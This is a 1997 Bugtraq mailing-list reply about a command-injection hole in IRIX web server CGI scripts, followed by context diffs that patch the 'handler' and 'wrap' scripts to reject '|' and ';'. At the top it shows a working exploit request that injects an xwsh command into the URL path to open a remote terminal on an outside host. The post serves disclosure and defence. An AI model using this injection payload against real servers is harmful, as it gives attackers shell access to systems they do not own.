Bugtraq mailing list archives

Re: CPSR 7: IRIX WWW Server

From: spd () GTC1 CPS UNIZAR ES (J.A. Gutierrez)
Date: Wed, 23 Jul 1997 21:08:29 +0200


telnet www.highly.respectable.bank.com 80
Trying 300.300.300.1...
Connected to www.highly.respectable.bank.com
Escape character is '^]'.
GET /cgi-bin/handler/blah;xwsh  -display        yourhost.com|?data=Download



        to fix: disable both or patch them:

###########################################################################


*** handler.orig        Wed Jul 23 20:49:26 1997
--- handler     Wed Jul 23 20:55:25 1997
***************
*** 26,31 ****
--- 26,32 ----
  $pathRoot = $_[$#_] ;
  $doc      = $ROOT.$PATH ;

+ $_ = $PATH;
  &ErrBadPath unless &ValidPath ; # Check for server spoofing

  #__________________________________________________________
***************
*** 108,113 ****
--- 109,117 ----

  sub ValidPath
  {
+ # suggested by drazvan () kappa ro
+     if (/[|;]/)       { return '' };
+
      return 1 unless /\.\./ ;

      return '' if /^\.\./ ;
***************
*** 117,120 ****
--- 121,136 ----
      return 1 ;
  }

+ sub ErrBadPath
+ {
+       print <<ENDOFTEXT ;
+ Content-type: text/html

+ <HEAD><TITLE>404 Not Found</TITLE></HEAD>
+ <BODY><H1>404 Not Found</H1>
+ The requested URL $PATH was not found on this server.<P>
+ </BODY>
+ ENDOFTEXT
+
+       die ;
+ }



*** wrap.orig   Wed Jul 23 20:51:08 1997
--- wrap        Wed Jul 23 20:51:08 1997
***************
*** 66,71 ****
--- 66,74 ----
  $doc      = $ROOT.$PATH ;

  &DefaultMesg if ! defined $PATH || $PATH eq "" ;      # Get a base listing =)
+
+ $_ = $PATH;
+
  &ErrBadPath unless &ValidPath ;       # Check for server spoofing
  &ErrBadPath unless -e $doc ;  # Check to see it exists
  &HandleDownload if -f $doc ;  # Do the right thing
***************
*** 242,247 ****
--- 245,253 ----

  sub ValidPath
  {
+ # suggested by drazvan () kappa ro
+       if (/[|;]/) { return '' };
+
        return 1 unless /\.\./ ;

        return '' if /^\.\./ ;


###########################################################################


        comments welcome

--

    .signature intentionally left blank

Current thread:

DoS against Oracle Webserver 2.1 with PL/SQL stored procedures Simon Josefsson (Jul 22)
- Re: DoS against Oracle Webserver 2.1 with PL/SQL stored procedures Stefan Rompf (Jul 23)
- CPSR 7: IRIX WWW Server Corinne Posse Releases (Jul 23)
  - Re: CPSR 7: IRIX WWW Server J.A. Gutierrez (Jul 23)
  - SGI Security Advisory 19970701-01-PX - talkd Vulnerability SGI Security Coordinator (Jul 23)
- <Possible follow-ups>
- Re: DoS against Oracle Webserver 2.1 with PL/SQL stored procedures Ross Potts (Jul 23)
- Re: DoS against Oracle Webserver 2.1 with PL/SQL stored procedures Simon Josefsson (Jul 23)
- Re: DoS against Oracle Webserver 2.1 with PL/SQL stored procedures Matthew G. Harrigan (Jul 23)